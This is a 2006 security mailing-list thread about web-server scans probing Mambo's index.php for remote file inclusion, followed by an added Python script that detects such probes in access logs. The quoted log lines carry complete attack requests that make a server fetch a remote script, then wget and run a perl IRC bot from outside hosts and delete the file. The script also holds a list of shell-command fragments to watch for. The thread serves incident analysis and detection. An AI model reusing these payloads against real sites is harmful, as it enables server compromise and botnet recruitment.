Looks like some sort of shellbot wanting to connect to an IRC channel #abusers on abuser.hacked.in:8080.
I've been seeing occasional probes for Mambo's index.php on and off for a while now - the first part is similar to http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the payloads are slightly different, though it always seems to end up with an IRC bot of some kind. I usually see them coupled with scans for coppermine and other remote include issues, plus xmlrpc probes. I think you're seeing an attempt to exploit issue #3 here - http://secunia.com/advisories/18935/

cheers,
Jamie

On 14/05/06, Daniel Cid <[EMAIL PROTECTED]> wrote:
Since Thursday night I'm seeing a high volume of scans on different web servers for possibly the following vulns:

http://secunia.com/advisories/14337/
http://www.osvdb.org/displayvuln.php?osvdb_id=10180

However, they say the problem is on function.php and I'm seeing them on index.php. Can anyone confirm that?

Some log samples:

200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
-- Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED] NZ Honeynet project - http://www.nz-honeynet.org/
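The probe signature in the quoted log lines (an external URL in mosConfig_absolute_path, an empty GLOBALS= parameter, and a cmd= download-and-run payload) can be pulled out of an access log mechanically. The detector below is an added example written for this thread, not code from either poster or from the honeynet paper: it parses four of the lines Daniel quoted plus one constructed benign request, and its choice of which parameters and shell fragments to flag is this example's own assumption rather than a rule taken from the advisories.

```python
"""Flag Mambo-style remote-file-inclusion probes in Apache combined logs.

Added example for this thread, not code from the list posters. The four
probe lines in SAMPLE_LOG are copied from the thread; the benign line is
constructed; the flagged parameters and shell fragments are assumptions.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" format, the shape of the samples in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Include-path parameter abused in the thread's samples (assumption: the
# only one we care about here; a real deployment would list more).
INCLUDE_PARAMS = ("mosConfig_absolute_path",)
URL_RE = re.compile(r"https?://[^\s;]+", re.I)
# Fragments typical of the download-and-run payloads quoted in the thread.
SHELL_HINTS = ("wget ", "curl ", "perl ", "cd /tmp", "rm -rf")

# Four of Daniel's lines (one per source/payload host) plus one constructed
# benign request, so the detector's silence on normal traffic is visible.
SAMPLE_LOG = """\
200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2006:16:55:00 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.0" 200 5123 "-" "Mozilla/5.0"
"""


def parse_query(qs):
    """Split a query string on '&' only. parse_qs() is avoided on purpose:
    older Pythons also split on ';', which would shred the cmd= payload."""
    params = {}
    for pair in qs.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it doesn't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"], rec["query"] = path, parse_query(query)
    return rec


def classify(rec):
    """Return a list of (reason, detail) findings for a parsed request."""
    findings, q = [], rec["query"]
    for name in INCLUDE_PARAMS:
        for value in q.get(name, []):
            # The trailing '?' on the included URL makes anything the
            # application appends a query string for the remote server.
            if URL_RE.match(value):
                findings.append(("remote_include", f"{name}={value}"))
    for value in q.get("cmd", []):
        if any(hint in value for hint in SHELL_HINTS):
            findings.append(("command_payload", value))
    if "GLOBALS" in q:
        # Present in every probe in the thread; a weak signal on its own.
        findings.append(("globals_param", "GLOBALS=" + ",".join(q["GLOBALS"])))
    return findings


def payload_hosts(findings):
    """Hostnames of every URL referenced by the findings (for an IoC/block list)."""
    hosts = set()
    for _, detail in findings:
        for url in URL_RE.findall(detail):
            host = urlsplit(url).hostname
            if host:
                hosts.add(host)
    return hosts


def analyze(log_text):
    """Summarise a block of log text: hit count, attacking IPs, payload hosts."""
    report = {"parsed": 0, "hits": 0, "sources": set(), "payload_hosts": set(), "findings": []}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        report["parsed"] += 1
        findings = classify(rec)
        if findings:
            report["hits"] += 1
            report["sources"].add(rec["ip"])
            report["payload_hosts"] |= payload_hosts(findings)
            report["findings"].append((rec["ip"], rec["ts"], findings))
    return report


if __name__ == "__main__":
    r = analyze(SAMPLE_LOG)
    for ip, ts, findings in r["findings"]:
        print(ip, ts, [reason for reason, _ in findings])
    print("payload hosts:", sorted(r["payload_hosts"]))
```

Run against a real log, the useful outputs are the two sets: source IPs to correlate across servers (the same few hosts recur in Daniel's samples) and payload hosts to add to egress filtering, since the bot only gets installed if the web server can fetch from them. The 404s in the samples show the probe missing on those servers; a 200 on the same request shape is the line worth investigating.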
